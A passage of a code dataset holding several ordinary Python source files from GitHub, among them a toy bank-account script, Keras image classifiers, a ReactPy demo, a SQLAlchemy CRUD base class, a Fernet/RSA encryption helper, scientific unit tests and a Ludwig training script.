({ref_code})\")\n","repo_name":"emo-bon/ena-sample-registration-action","sub_path":"action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":10769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10338085235","text":"def account(accno,accname,accpin,balance):\n print(\"Your account Information\")\n print(\"Account Number:\",accno)\n print(\"Accountant Name:\",accname)\n print(\"Account Pin:\",accpin)\n print(\"Balance:\",balance)\n print(\"\\n \\n Click the options\")\n i=0\n while i<=3:\n choice=int(input(\"1. Deposit\\n 2. 
Withdraw\\n 3.Check Balance \"))\n if choice==1:\n deposit=int(input(\"Enter the deposit amount:\"))\n if deposit>=100:\n balance=balance+deposit\n print(\"Thank you for deposition !\")\n print(\"Total amount:\",balance)\n else:\n print(\"Please deposit more than 100 Rs\")\n elif(choice==2):\n withdrawamt=int(input(\"Enter the withdraw amount:\"))\n if withdrawamt>=100:\n balance-=withdrawamt\n print(\"You have successfully withdrawn Rs\",withdrawamt)\n print(\"Total amount:\",balance)\n else:\n print(\"Please withdraw more than 100 Rs\")\n elif(choice==3):\n print(\"Total amount:\",balance)\n else:\n print(\"Invalid Choice!\")\n i+=1\n\nacno=input(\"Enter the Account Number:\")\nacname=input(\"Enter Accountant name: \")\nacpin=input(\"Enter Account pin: \")\nbalance=0\n\naccount(acno,acname,acpin,balance)\n","repo_name":"Ash515/Transaction-Service","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"10589914805","text":"from keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Convolution2D, MaxPooling2D\r\nfrom keras.layers import Activation, Dropout, Flatten, Dense\r\n\r\n\r\nmodel = Sequential()\r\nmodel.add(Convolution2D(nb_filter=32, nb_row=3,\r\n nb_col=3, input_shape=(3, 150, 150)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n\r\nmodel.add(Convolution2D(32, 3, 3))\r\nmodel.add(Activation('relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n\r\nmodel.add(Convolution2D(nb_filter=64, nb_row=3, nb_col=3))\r\nmodel.add(Activation('relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n\r\n# o model ate agora, tem como outputs mapas de funcionalidade 3d (height, width, features)\r\n# converte nossos mapas de recursos 3D em vetores de recursos 1D\r\nmodel.add(Flatten())\r\nmodel.add(Dense(64)) # 64 neurons\r\nmodel.add(Activation('relu'))\r\nmodel.add(Dropout(0.5)) # Faz um drop de 50% dos neurons\r\n\r\n# Camada de saida: Classifica os dez estados do motorista\r\nmodel.add(Dense(10))\r\nmodel.add(Activation('softmax'))\r\n\r\n# Compila o model\r\nmodel.compile(loss='categorical_crossentropy',\r\n optimizer='adadelta', metrics=['accuracy'])\r\n\r\n# Config de aumento para gerar training data\r\ntrain_datagen = ImageDataGenerator(\r\n rescale=1.0/255, shear_range=0.2, zoom_range=0.2, horizontal_flip=True)\r\n\r\n# a validação de imagem esta escalada em 1/255, nenhum outro aumento para nossa validacao de dados\r\ntest_datagen = ImageDataGenerator(rescale=1.0/255)\r\n\r\n\r\n# esse é o gerador que ira ler imagens en contradas em sub pastas de 'data/train',\r\n# e indefinitivamente gera batch de dados de imagem aumentados!\r\ntrain_generator = train_datagen.flow_from_directory('data/train', target_size=(150, 150),\r\n batch_size=32, class_mode='categorical')\r\n\r\n# Este é o gerador de dados de validação\r\nvalidation_generator = test_datagen.flow_from_directory('data/validation', target_size=(150, 150),\r\n batch_size=32, class_mode='categorical')\r\n\r\n# trainando convolutional neural network\r\nmodel.fit_generator(train_generator, samples_per_epoch=20924, nb_epoch=20,\r\n validation_data=validation_generator, nb_val_samples=800)\r\n\r\n# Salvando os 
\r\n# Augmentation configuration used to generate training data\r\ntrain_datagen = ImageDataGenerator(\r\n    rescale=1.0/255, shear_range=0.2, zoom_range=0.2, horizontal_flip=True)\r\n\r\n# validation images are only rescaled by 1/255; no other augmentation is applied to the validation data\r\ntest_datagen = ImageDataGenerator(rescale=1.0/255)\r\n\r\n\r\n# this generator reads images found in subfolders of 'data/train'\r\n# and yields batches of augmented image data indefinitely\r\ntrain_generator = train_datagen.flow_from_directory('data/train', target_size=(150, 150),\r\n                                                    batch_size=32, class_mode='categorical')\r\n\r\n# This is the validation data generator\r\nvalidation_generator = test_datagen.flow_from_directory('data/validation', target_size=(150, 150),\r\n                                                        batch_size=32, class_mode='categorical')\r\n\r\n# training the convolutional neural network\r\nmodel.fit_generator(train_generator, samples_per_epoch=20924, nb_epoch=20,\r\n                    validation_data=validation_generator, nb_val_samples=800)\r\n\r\n# Saving the weights\r\nmodel.save_weights('driver_state_detection_small_CNN.h5')\r\n","repo_name":"caiocobacho/deeplearning4driver","sub_path":"driver_distraido.py","file_name":"driver_distraido.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"29435624409","text":"from reactpy import component, html, run, hooks\n\n@component\ndef hello_world():\n    return html.h1(\"Hello, World!\")\n\n@component\ndef Photo():\n\n    def handle_photo_click(event):\n        print(\"Photo clicked.\")\n\n    # pass the handler itself; calling it here would fire during rendering instead of on click\n    return html.button(\n        { \"on_click\": handle_photo_click },\n        html.img(\n            {\n                \"src\": \"https://picsum.photos/id/456/500/300\",\n                \"style\": {\"width\": \"50%\"},\n                \"alt\": \"Puppy\",\n                \"on_click\": handle_photo_click\n            }\n        ),\n    )\n\n\ndef increment(last_count):\n    return last_count + 1\n\n\ndef decrement(last_count):\n    return last_count - 1\n\n\n@component\ndef Counter():\n    initial_count = 0\n    count, set_count = hooks.use_state(initial_count)\n    return html.div(\n        html.div(\n            hello_world()\n        ),\n        html.br(),\n        f\"Count: {count}\",\n        html.br(),\n        html.button(\n            {\"on_click\": lambda event: set_count(initial_count)}, \"Reset\"\n        ),\n        html.br(),\n        html.div(\n            {\"style\":\n                {\"backgroundColor\": \"blue\", \"height\": \"80px\"},\n             \"children\": [\"nested...\", \"nested2...\"]\n            }\n        ),\n        html.button({\"on_click\": lambda event: set_count(increment)}, \"+\"),\n        html.button({\"on_click\": lambda event: set_count(decrement)}, \"-\"),\n        Photo()\n    )\n\nrun(Counter)","repo_name":"bmetenko/Tinkering","sub_path":"py/reactpy_main.py","file_name":"reactpy_main.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"43455008641","text":"# -*- coding: utf-8 -*-\nimport os\n\nfrom gtts import gTTS\nimport speech_recognition as sr\n\n\ndef record_audio():\n    r = sr.Recognizer()\n    with sr.Microphone() as source:\n        print(\"Say something!\")\n        audio = r.listen(source)\n    data = None\n    try:\n        data = str(r.recognize_google(audio))\n    except sr.UnknownValueError:\n        print(\"Google Speech Recognition could not understand audio\")\n    except sr.RequestError as e:\n        print(\n            \"Could not request results from Google Speech Recognition service; {0}\".format(e))\n    return data or \"\"\n\n\ndef speak(audio_string):\n    print(audio_string)\n    tts = gTTS(text=audio_string, lang='en')\n    tts.save(\"here.mp3\")\n    os.system(\"mpg123 here.mp3\")\n","repo_name":"Shrey-Patel/Pybot","sub_path":"pybotcli/packages/audioHandler.py","file_name":"audioHandler.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"2656284360","text":"from typing import Any, Generic, List, Optional, Type, TypeVar\n\nimport sqlalchemy\nfrom pydantic import BaseModel\nfrom sqlalchemy.orm import Session\nfrom starlette.exceptions import HTTPException\n\nfrom app.main.database.db import Base\n\nModelType = TypeVar(\"ModelType\", bound=Base)\nCreateSchemaType = TypeVar(\"CreateSchemaType\", bound=BaseModel)\nUpdateSchemaType = TypeVar(\"UpdateSchemaType\", bound=BaseModel)\n\n\nclass CRUDBase(Generic[ModelType, CreateSchemaType, UpdateSchemaType]):\n    def __init__(self, model: Type[ModelType]):\n        \"\"\"\n        Base service for the CRUD operations CREATE, READ, UPDATE and DELETE.\n\n\n        :param model: model which is used.\n        \"\"\"\n        self.model = model\n
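\n    # A hypothetical usage sketch (Item, ItemCreate, ItemUpdate and db_session are\n    # illustrative names, not part of this module):\n    #   item_crud = CRUDBase[Item, ItemCreate, ItemUpdate](Item)\n    #   item = item_crud.get(db_session, id=42)\n    #   items = item_crud.list(db_session)\n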
\n    def get(self, db_session: Session, id: Any) -> Optional[ModelType]:\n        \"\"\"\n        Gets a specific object from the database.\n\n\n        :param db_session: Current Session.\n        :param id: Identifier for the object, which is going to be searched.\n        :return: Found Object\n        \"\"\"\n        return db_session.query(self.model).filter(self.model.id == id).first()\n\n    def list(self, db_session: Session) -> List[ModelType]:\n        \"\"\"\n        Queries all objects of this model type.\n\n        :param db_session: Current Session.\n        :return: List of Objects\n        \"\"\"\n        objs: List[ModelType] = db_session.query(self.model).all()\n        return objs\n\n    def create(self, obj: CreateSchemaType, db_session: Session) -> ModelType:\n        \"\"\"\n        Creates an object in the database.\n\n        :param db_session: Current Session.\n        :param obj: Object which is going to be created in the database.\n        :return: Created Object\n        \"\"\"\n        db_obj: ModelType = self.model(**obj.dict())\n        db_session.add(db_obj)\n        try:\n            db_session.commit()\n        except sqlalchemy.exc.IntegrityError as e:\n            db_session.rollback()\n            if \"duplicate key\" in str(e):\n                raise HTTPException(status_code=409, detail=\"Conflict Error\")\n            else:\n                raise e\n        return db_obj\n\n    def update(self, object_id: Any, obj: UpdateSchemaType, db_session: Session) -> Optional[ModelType]:\n        \"\"\"\n        Updates a specific object in the database.\n\n        :param object_id: Identifier of the object which is going to be updated\n        :param obj: Data of the updated Object\n        :param db_session: Current Session.\n        :return: Updated Object.\n        \"\"\"\n        db_obj = self.get(db_session, object_id)\n        for column, value in obj.dict(exclude_unset=True).items():\n            setattr(db_obj, column, value)\n        db_session.commit()\n        return db_obj\n\n    def delete(self, object_id: Any, db_session: Session) -> None:\n        \"\"\"\n        Deletes a specific object by its identifier.\n\n        :param object_id: Identifier of the Object which is going to be deleted\n        :return:\n        \"\"\"\n\n        db_obj = db_session.query(self.model).get(object_id)\n        db_session.delete(db_obj)\n        db_session.commit()\n","repo_name":"mamotec/MaMoTecEnergy","sub_path":"app/main/crud/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"43979114785","text":"import rsa\r\nfrom cryptography.fernet import Fernet\r\n\r\n\r\ndef Encryption(message):\r\n    \r\n    # open the message key\r\n    skey =open('message.key','rb')\r\n    key=skey.read()\r\n    \r\n    # create the cipher\r\n    chipher = Fernet(key)\r\n    \r\n    \r\n    # write the encrypted data\r\n    encrypt_data =chipher.encrypt(bytes(message,'utf-8'))\r\n    edata = open(\"EncryptedFiles\",\"wb\")\r\n    edata.write(encrypt_data)\r\n    \r\n    public_key= open('public_key.key','rb')\r\n    pubKey=public_key.read()\r\n    \r\n    # encrypt the symmetric key with the RSA public key\r\n    pukey= rsa.PublicKey.load_pkcs1(pubKey)\r\n    encrypt_data = rsa.encrypt(key,pukey)\r\n    \r\n    # write the encrypted key\r\n    edata = open(\"Encryptedkey\",\"wb\")\r\n    edata.write(encrypt_data)\r\n","repo_name":"DinethJaay/Data-Encryption-and-Data-Decryption-Using-Python","sub_path":"day3/encryptionData.py","file_name":"encryptionData.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"11839392910","text":"# This file is part of swprocess, a Python package for surface wave processing.\r\n# Copyright (C) 2020 Joseph P. 
Vantassel (joseph.p.vantassel@gmail.com)\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program. If not, see .\r\n\r\n\"\"\"Tests for Sensor1C.\"\"\"\r\n\r\nimport warnings\r\nimport logging\r\nfrom unittest.mock import MagicMock\r\n\r\nimport numpy as np\r\nimport obspy\r\n\r\nfrom swprocess import ActiveTimeSeries, Sensor1C\r\nfrom testtools import unittest, TestCase, get_path\r\n\r\nlogging.basicConfig(level=logging.ERROR)\r\n\r\n\r\nclass Test_Sensor1C(TestCase):\r\n\r\n @classmethod\r\n def setUpClass(cls):\r\n cls.path = get_path(__file__)\r\n cls.wghs_path = cls.path / \"../examples/masw/data/wghs/\"\r\n\r\n cls.a_amp = np.array([0, 1, 2, 1, 0, 1], dtype=np.double)\r\n cls.a_dt = 1.\r\n cls.tseries_a = ActiveTimeSeries(cls.a_amp, cls.a_dt)\r\n\r\n cls.b_amp = np.array([0, 1, 0, 1, 0, 1], dtype=np.double)\r\n cls.b_dt = 1.\r\n cls.tseries_b = ActiveTimeSeries(cls.b_amp, cls.b_dt)\r\n\r\n def test_init(self):\r\n # __init__\r\n sensor_1 = Sensor1C(self.a_amp, self.a_dt, 0, 0, 0)\r\n\r\n self.assertArrayEqual(self.a_amp, sensor_1.amplitude)\r\n self.assertEqual(self.a_dt, sensor_1.dt)\r\n\r\n # from_activetimeseries\r\n sensor_2 = Sensor1C.from_activetimeseries(self.tseries_a, 0, 0, 0)\r\n self.assertEqual(sensor_1, sensor_2)\r\n\r\n def test_from_trace(self):\r\n # seg2\r\n with warnings.catch_warnings():\r\n warnings.simplefilter(\"ignore\")\r\n traces = obspy.read(str(self.wghs_path / \"6.dat\"))\r\n trace = traces[0]\r\n sensor = Sensor1C.from_trace(trace)\r\n self.assertArrayEqual(trace.data, sensor.amplitude)\r\n self.assertEqual(trace.stats.delta, sensor.dt)\r\n x = float(trace.stats.seg2.RECEIVER_LOCATION)\r\n self.assertTupleEqual((x, 0., 0.),\r\n (sensor.x, sensor.y, sensor.z))\r\n self.assertEqual(float(trace.stats.seg2.DELAY), sensor.delay)\r\n self.assertEqual(int(trace.stats.seg2.STACK), sensor.nstacks)\r\n\r\n # su\r\n with warnings.catch_warnings():\r\n warnings.simplefilter(\"ignore\")\r\n traces = obspy.read(str(self.path / \"data/custom/shot1.su\"))\r\n trace = traces[0]\r\n sensor = Sensor1C.from_trace(trace)\r\n self.assertArrayEqual(trace.data, sensor.amplitude)\r\n self.assertEqual(trace.stats.delta, sensor.dt)\r\n header = trace.stats.su.trace_header\r\n scaleco = int(header[\"scalar_to_be_applied_to_all_coordinates\"])\r\n scaleco = abs(1/scaleco) if scaleco < 0 else scaleco\r\n x, y = [int(header[key]) *scaleco for key in [f\"group_coordinate_{c}\" for c in [\"x\", \"y\"]]]\r\n self.assertTupleEqual((x, y, 0.),\r\n (sensor.x, sensor.y, sensor.z))\r\n self.assertEqual(float(header[\"delay_recording_time\"]), sensor.delay)\r\n nstack_key = \"number_of_horizontally_stacked_traces_yielding_this_trace\"\r\n self.assertEqual(int(header[nstack_key])+1, sensor.nstacks)\r\n\r\n # read_header=False\r\n for cpath in [self.wghs_path / \"11.dat\", self.path /\"data/custom/shot1.su\"]:\r\n with warnings.catch_warnings():\r\n warnings.simplefilter(\"ignore\")\r\n traces = obspy.read(str(cpath))\r\n sensor = 
Sensor1C.from_trace(\r\n trace, read_header=False, nstacks=15, delay=-2, x=3, y=6, z=12)\r\n self.assertArrayEqual(trace.data, sensor.amplitude)\r\n self.assertEqual(trace.stats.delta, sensor.dt)\r\n self.assertEqual(15, sensor.nstacks)\r\n self.assertEqual(-2., sensor.delay)\r\n self.assertListEqual([3, 6, 12],\r\n [getattr(sensor, c) for c in [\"x\", \"y\", \"z\"]])\r\n\r\n # set trace.stats._format to integer so it raises ValueError\r\n mock_trace = MagicMock()\r\n mock_trace.stats._format = 1\r\n self.assertRaises(ValueError, Sensor1C.from_trace, mock_trace)\r\n\r\n def test_is_similar(self):\r\n a = Sensor1C(amplitude=[1.,2,3], dt=1., x=0, y=0, z=0, nstacks=1, delay=0)\r\n\r\n b = \"Not a Sensor1C\"\r\n c = Sensor1C(amplitude=[1.,2], dt=1., x=0, y=0, z=0, nstacks=1, delay=0)\r\n d = Sensor1C(amplitude=[1.,2,3], dt=2., x=0, y=0, z=0, nstacks=1, delay=0)\r\n e = Sensor1C(amplitude=[1.,2,3], dt=1., x=1, y=0, z=0, nstacks=1, delay=0)\r\n f = Sensor1C(amplitude=[1.,2,3], dt=1., x=0, y=1, z=0, nstacks=1, delay=0)\r\n g = Sensor1C(amplitude=[1.,2,3], dt=1., x=0, y=0, z=1, nstacks=1, delay=0)\r\n h = Sensor1C(amplitude=[1.,2,3], dt=1., x=0, y=0, z=0, nstacks=2, delay=0)\r\n i = Sensor1C(amplitude=[1.,2,3], dt=1., x=0, y=0, z=0, nstacks=1, delay=-0.5)\r\n\r\n j = Sensor1C(amplitude=[1.,2,3], dt=1., x=0, y=0, z=0, nstacks=1, delay=0)\r\n\r\n self.assertFalse(a._is_similar(b))\r\n self.assertFalse(a._is_similar(c))\r\n self.assertFalse(a._is_similar(d))\r\n self.assertFalse(a._is_similar(e))\r\n self.assertFalse(a._is_similar(f))\r\n self.assertFalse(a._is_similar(g))\r\n\r\n self.assertTrue(a._is_similar(c, exclude=[\"nsamples\"]))\r\n self.assertTrue(a._is_similar(d, exclude=[\"dt\"]))\r\n self.assertTrue(a._is_similar(e, exclude=[\"x\"]))\r\n self.assertTrue(a._is_similar(f, exclude=[\"y\"]))\r\n self.assertTrue(a._is_similar(g, exclude=[\"z\"]))\r\n self.assertTrue(a._is_similar(h, exclude=[\"nstacks\"]))\r\n self.assertTrue(a._is_similar(i, exclude=[\"delay\"]))\r\n self.assertTrue(a._is_similar(j))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n","repo_name":"jpvantassel/swprocess","sub_path":"test/test_sensor1c.py","file_name":"test_sensor1c.py","file_ext":"py","file_size_in_byte":6248,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"5933489908","text":"import pytest\nfrom DynaSysML.Flow.shuffle import *\nfrom Tests.helper import *\nfrom Tests.ops import *\nfrom DynaSysML.core import get_parameter, index_select\nimport torch\nimport DynaSysML as dsl\n\n\n\n\ndef check_shuffling_flow(ctx,\n spatial_ndims: int,\n cls):\n num_features = 5\n\n for batch_shape in ([2], [2, 3]):\n shape = make_conv_shape(\n batch_shape, num_features, [6, 7, 8][: spatial_ndims])\n\n # test constructor\n flow = cls(num_features)\n assert(f'num_features={num_features}' in repr(flow))\n permutation = get_parameter(flow, 'permutation')\n inv_permutation = get_parameter(flow, 'inv_permutation')\n assert(torch.argsort(permutation) == inv_permutation).all()\n assert(torch.argsort(inv_permutation) == permutation).all()\n # flow = T.jit_compile(flow)\n\n # prepare for the answer\n x = torch.randn(shape)\n channel_axis = get_channel_axis(spatial_ndims)\n expected_y = index_select(x, permutation, axis=channel_axis)\n assert(\n index_select(expected_y, inv_permutation, axis=channel_axis) - x < 1e-6\n ).all()\n expected_log_det = torch.zeros(batch_shape)\n\n # check the flow\n flow_standard_check(ctx, flow, x, expected_y, expected_log_det,\n 
torch.randn(batch_shape))\n\n\nclass TestRearrangement(object):\n\n def test_FeatureShuffleFlow(self):\n check_shuffling_flow(self, 0, FeatureShufflingFlow)\n\n def test_FeatureShuffleFlowNd(self):\n for spatial_ndims in (1, 2, 3):\n check_shuffling_flow(\n self,\n spatial_ndims,\n getattr(dsl.Flow, f'FeatureShufflingFlow{spatial_ndims}d'),\n )\n","repo_name":"yantijin/DynaSysML","sub_path":"Tests/Flow/test_shuffle.py","file_name":"test_shuffle.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"33895055456","text":"#!/usr/bin/env python3\n\nimport time\nimport random\nimport threading\nimport os\nimport logging\n\nfrom prometheus_client import CollectorRegistry, Counter, push_to_gateway, Summary\nfrom mpi4py import MPI\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG,\n format='(%(threadName)-10s) %(message)s',\n )\n\nregistry = CollectorRegistry()\n\n# Test Summary\ns = Summary('psana_wait_recv_ms', 'Waiting for something', registry=registry)\n@s.time()\ndef receive():\n time.sleep(2)\n\ndef push_metrics(e, registry):\n while not e.isSet():\n push_to_gateway('psdm03:9091', job='pushgateway', grouping_key={'pid': os.getpid()}, registry=registry)\n logging.debug('rank: %d (pid: %d) pushed %s'%(rank, os.getpid(), time.time()))\n time.sleep(5) \n\ndef test_send():\n # Test Counter\n if rank == 0:\n c = Counter('evts_transmit', 'events handed to big data nodes', ['unit'], registry=registry)\n else:\n c = Counter('evts_received', 'events received', ['unit'], registry=registry)\n\n if rank == 0:\n another_c = registry._names_to_collectors['evts_transmit_total']\n else:\n another_c = registry._names_to_collectors['evts_received_total']\n\n e = threading.Event()\n gw_thread = threading.Thread(target=push_metrics, args=(e, registry), daemon=True)\n gw_thread.start()\n\n cn = 0\n while True:\n if rank == 0:\n another_c.labels('evts').inc(1)\n another_c.labels('size').inc(100)\n else:\n another_c.labels('evts').inc(5)\n another_c.labels('size').inc(500)\n\n time.sleep(2)\n cn += 1\n logging.debug('cn=%d'%cn)\n \n receive()\n logging.debug('call receive def')\n\n #if cn == 30:\n # break\n\n logging.debug('exit')\n e.set()\n\nif __name__ == \"__main__\":\n logging.debug('test 1')\n test_send()\n #logging.debug('test 2')\n #test_send()\n","repo_name":"monarin/psana-nersc","sub_path":"psana2/prometheus/sent_to_pushdateway.py","file_name":"sent_to_pushdateway.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25206358059","text":"\"\"\"\r\nVersion : 1.0 ( 06-16-2022).\r\n\r\nAuthor : Mbaye DIONGUE\r\n\r\nCopyright (C) 2019\r\n\r\nThis file is part of the codes provided at http://proximity-operator.net\r\n\r\nBy downloading and/or using any of these files, you implicitly agree to\r\nall the terms of the license CeCill-B (available online).\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\n\r\nclass EpiSupport:\r\n r\"\"\"Compute the projection and the indicator of the epigraph of phi.\r\n\r\n Where phi is the function defined as:\r\n\r\n\r\n / * a * x if x < 0\r\n phi(y)= sigma_[a,b](y) = | 0 if x = 0\r\n \\ b * x otherwise\r\n\r\n\r\n When the inputs are arrays, the outputs are computed element-wise\r\n INPUTS\r\n ========\r\n y - ND array\r\n kxi - ND array with the same size as 'y'\r\n a - negative, scalar or ND array with the same size as x\r\n b 
- positive, scalar or ND array with the same size as x\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n ksi: np.ndarray,\r\n a: float or np.array = -1.0,\r\n b: float or np.array = 1.0\r\n ):\r\n if np.any(a > 0):\r\n raise ValueError(\"'a' (or all of its components ) must be negative\")\r\n if np.any(b < 0):\r\n raise ValueError(\"'b' (or all of its components ) must be positive\")\r\n if np.size(a) > 1 and (np.size(a) != np.size(ksi)):\r\n raise ValueError(\" 'a' must be a scalar or have the same size as 'ksi'\")\r\n if np.size(b) > 1 and (np.size(b) != np.size(ksi)):\r\n raise ValueError(\" 'b' must be a scalar or have the same size as 'ksi'\")\r\n if np.size(ksi) <= 1:\r\n ksi = np.reshape(ksi, (-1))\r\n self.a = a\r\n self.b = b\r\n self.ksi = ksi\r\n\r\n # proximal operator (i.e. the projection on the constraint set)\r\n def prox(self, y: np.ndarray) -> [np.ndarray, np.ndarray]:\r\n self._check(y)\r\n ksi = self.ksi\r\n a = self.a\r\n b = self.b\r\n if np.size(y) <= 1:\r\n y = np.reshape(y, (-1))\r\n\r\n # 4th branch\r\n prox_p = np.zeros(np.size(y))\r\n prox_t = np.zeros(np.size(y))\r\n\r\n # 3rd branch\r\n mask = np.logical_and(a * y > ksi, -y / a <= ksi)\r\n pp = (y + a * ksi) / (1 + a**2)\r\n tt = a * pp\r\n prox_p[mask] = pp[mask]\r\n prox_t[mask] = tt[mask]\r\n\r\n # 2nd branch\r\n mask = np.logical_and(b * y > ksi, -y / b <= ksi)\r\n pp = (y + b * ksi) / (1 + b**2)\r\n tt = b * pp\r\n prox_p[mask] = pp[mask]\r\n prox_t[mask] = tt[mask]\r\n\r\n # 1st branch\r\n mask = np.logical_and(a * y <= ksi, b * y <= ksi)\r\n prox_p[mask] = y[mask]\r\n prox_t[mask] = ksi[mask]\r\n return [prox_p, prox_t]\r\n\r\n # indicator of the constraint set\r\n def __call__(self, y) -> float:\r\n if np.all(self.a * y <= self.ksi) and np.all(self.b * y <= self.ksi):\r\n return 0\r\n return np.inf\r\n\r\n def _check(self, y):\r\n if np.size(y) != np.size(self.ksi):\r\n raise ValueError(\" 'y' must have the same size as 'ksi'\")\r\n","repo_name":"mbayediongue/proxop","sub_path":"src/proxop/indicator/EpiSupport.py","file_name":"EpiSupport.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2502292623","text":"import logging\nfrom ludwig.api import LudwigModel\nfrom pandas import read_csv\nimport pandas as pd\n\ntrain_df_1 = read_csv(\"impressionism.csv\")\ntrain_df_2 = read_csv(\"post-impressionism.csv\")\ntrain_df_3 = read_csv(\"northern-renaissance.csv\")\n\n\nlabels = [\"Impressionism\", \"Post_Impressionism\", \"Northern_Renaissance\"]\ntrain_stats = {}\npreprocessed_data = {}\noutput_directory = {}\n# Constructs Ludwig model from config dictionary\nmodel = LudwigModel(config='config.yaml', logging_level=logging.DEBUG)\ntrain_df = {'Impressionism': train_df_1, 'Post_Impressionism': train_df_2, 'Northern_Renaissance': train_df_3}\n\nfor style in labels:\n temp = labels.copy()\n temp.remove(style)\n train_df_1 = train_df[style]\n train_df_2 = train_df[temp[0]]\n train_df_3 = train_df[temp[1]]\n min_images = 352\n train_df_1 = train_df_1.sample(n = min_images)\n train_df_2, train_df_3 = train_df_2.sample(n = int(min_images/2)), train_df_3.sample(n = int(min_images/2))\n dataframes = [train_df_1, train_df_2, train_df_3]\n train_df_2 = dataframes[1].replace(temp[0], \"Other\")\n train_df_3 = dataframes[2].replace(temp[1], \"Other\")\n \n result = pd.concat([train_df_1, train_df_2, train_df_3])\n\n # Trains the model. 
This cell might take a few minutes.\n    train_stats[style], preprocessed_data[style], output_directory[style] = model.train(dataset=result,experiment_name=style)\n\n\n# # create Ludwig configuration dictionary\n# config = {\n#     'input_features': [\n#         {\n#             'name': 'image_path',\n#             'type': 'image',\n#             'encoder': {\n#                 'type': 'stacked_cnn',\n#             }\n#         }\n#     ],\n#     'output_features': [{'name': 'label', 'type': 'category'}],\n#     'trainer': {'epochs': 5}\n# }\n\n\n\n# # Generates predictions and performance statistics for the test set.\n# test_stats, predictions, output_directory = model.evaluate(\n#     train_df,\n#     collect_predictions=True,\n#     collect_overall_stats=True\n# )\n\n\n# confusion_matrix(\n#     [test_stats],\n#     model.training_set_metadata,\n#     'label',\n#     top_n_classes=[5],\n#     model_names=[''],\n#     normalize=True,\n# )\n\n# # Visualizes learning curves, which show how performance metrics changed over\n# # time during training.\n# from ludwig.visualize import learning_curves\n\n# learning_curves(train_stats, output_feature_name='label')\n\n# predictions, output_directory = model.predict(train_df)","repo_name":"AndreeaEch657/Style-recognition","sub_path":"image_test.py","file_name":"image_test.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"18904694044","text":"\r\n# importing libraries\r\nimport os\r\n\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras.layers import Activation, Dropout, Flatten, Dense\r\nfrom keras import backend as K\r\n\r\n\r\nimg_width, img_height = 224, 224\r\n# insert dataset\r\ntrain_data_dir = 'treaning'\r\nvalidation_data_dir = 'test'\r\nnum_of_train_samples = 480+321+550\r\nnum_of_test_samples = 12+80+147\r\nepochs = 30\r\nbatch_size = 64\r\nnum_classes=3\r\n# set the input shape depending on whether the backend expects channels first or channels last\r\nif K.image_data_format() == 'channels_first':\r\n\tinput_shape = (3, img_width, img_height)\r\nelse:\r\n\tinput_shape = (img_width, img_height, 3)\r\n# initialize the CNN\r\nclassify = Sequential()\r\nclassify.add(Conv2D(32, (3, 3), input_shape = input_shape))\r\nclassify.add(Activation('relu'))\r\nclassify.add(MaxPooling2D(pool_size =(2, 2)))\r\n\r\nclassify.add(Conv2D(32, (3, 3)))\r\nclassify.add(Activation('relu'))\r\nclassify.add(MaxPooling2D(pool_size =(2, 2)))\r\n\r\nclassify.add(Conv2D(64, (3, 3)))\r\nclassify.add(Activation('relu'))\r\nclassify.add(MaxPooling2D(pool_size =(2, 2)))\r\n\r\n\r\nclassify.add(Conv2D(128, (3, 3)))\r\nclassify.add(Activation('relu'))\r\nclassify.add(MaxPooling2D(pool_size =(2, 2)))\r\n\r\nclassify.add(Flatten())\r\nclassify.add(Dense(64))\r\nclassify.add(Activation('relu'))\r\nclassify.add(Dropout(0.5))  # to avoid overfitting on the dataset.\r\nclassify.add(Dense(num_classes, activation='softmax'))\r\n# optimizer chosen to minimize the loss; suits large data and has a small memory footprint\r\nclassify.compile(loss 